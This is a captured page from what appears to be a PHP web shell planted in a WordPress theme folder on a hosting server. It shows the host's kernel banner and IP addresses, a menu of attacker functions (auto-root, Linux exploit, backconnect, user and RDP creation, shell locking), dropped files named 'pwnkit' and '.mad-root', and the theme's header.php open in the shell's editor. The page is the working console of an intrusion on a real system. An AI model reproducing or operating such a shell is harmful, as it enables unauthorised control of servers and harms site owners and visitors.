Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
bravada /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
cryout
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
896
B
-rw-r--r--
archive.php
2.03
KB
-rw-r--r--
comments.php
1.45
KB
-rw-r--r--
footer.php
1009
B
-rw-r--r--
front-page.php
950
B
-rw-r--r--
functions.php
1.66
KB
-rw-r--r--
header.php
2.83
KB
-rw-r--r--
image.php
2.85
KB
-rw-r--r--
index.php
1.07
KB
-rw-r--r--
loco.xml
893
B
-rw-r--r--
page.php
658
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
16.47
KB
-rw-r--r--
screenshot.png
1.2
MB
-rw-r--r--
search.php
1.26
KB
-rw-r--r--
searchform.php
629
B
-rw-r--r--
sidebar-footer.php
475
B
-rw-r--r--
sidebar-left.php
1.21
KB
-rw-r--r--
sidebar-right.php
1.13
KB
-rw-r--r--
single.php
3.52
KB
-rw-r--r--
style.css
205.37
KB
-rw-r--r--
woocommerce.php
805
B
-rw-r--r--
wpml-config.xml
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header * * Displays all of the <head> section and everything up till <main> * * @package Bravada */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <?php cryout_meta_hook(); ?> <meta charset="<?php bloginfo( 'charset' ); ?>"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php if ( is_singular() && pings_open( get_queried_object() ) ) : ?> <link rel="pingback" href="<?php echo esc_url( get_bloginfo( 'pingback_url' ) ); ?>"> <?php endif; ?> <?php cryout_header_hook(); wp_head(); ?> </head> <body <?php body_class(); cryout_schema_microdata( 'body' );?>> <?php do_action( 'wp_body_open' ); ?> <?php cryout_body_hook(); ?> <div id="site-wrapper"> <header id="masthead" class="cryout" <?php cryout_schema_microdata( 'header' ) ?>> <div id="site-header-main"> <div class="site-header-top"> <div class="site-header-inside"> <div id="header-menu" <?php cryout_schema_microdata( 'menu' ); ?>> <?php cryout_topmenu_hook(); ?> </div><!-- #header-menu --> </div><!-- #site-header-inside --> </div><!--.site-header-top--> <?php if ( has_nav_menu( 'primary' ) || ( true == cryout_get_option('theme_pagesmenu') ) ) { ?> <nav id="mobile-menu" tabindex="-1"> <?php cryout_mobilemenu_hook(); ?> <?php do_action( 'cryout_side_section_hook' ); ?> </nav> <!-- #mobile-menu --> <?php } ?> <div class="site-header-bottom"> <div class="site-header-bottom-fixed"> <div class="site-header-inside"> <div id="branding"> <?php cryout_branding_hook(); ?> </div><!-- #branding --> <?php if ( bravada_check_empty_menu( 'primary' ) && ( has_nav_menu( 'primary' ) || ( true == cryout_get_option('theme_pagesmenu') ) ) ) { ?> <div class='menu-burger'> <button class='hamburger' type='button' aria-label="<?php esc_attr_e( 'Main menu', 'bravada' ) ?>"> <span></span> <span></span> <span></span> </button> </div> <?php } ?> <?php if ( bravada_check_empty_menu( 'top' ) && ( has_nav_menu( 'top' ) || ( true == cryout_get_option('theme_pagesmenu') ) ) ) { ?> <nav id="<?php echo apply_filters('bravada_navigation_compat', 'access') ?>" aria-label="<?php esc_attr_e( 'Top Menu', 'bravada' ) ?>" <?php cryout_schema_microdata( 'menu' ); ?>> <?php cryout_access_hook(); ?> </nav><!-- #access --> <?php } ?> </div><!-- #site-header-inside --> </div><!-- #site-header-bottom-fixed --> </div><!--.site-header-bottom--> </div><!-- #site-header-main --> <div id="header-image-main"> <div id="header-image-main-inside"> <?php cryout_headerimage_hook(); ?> </div><!-- #header-image-main-inside --> </div><!-- #header-image-main --> </header><!-- #masthead --> <?php cryout_absolute_top_hook(); ?> <div id="content" class="cryout"> <?php cryout_main_hook(); ?>
Close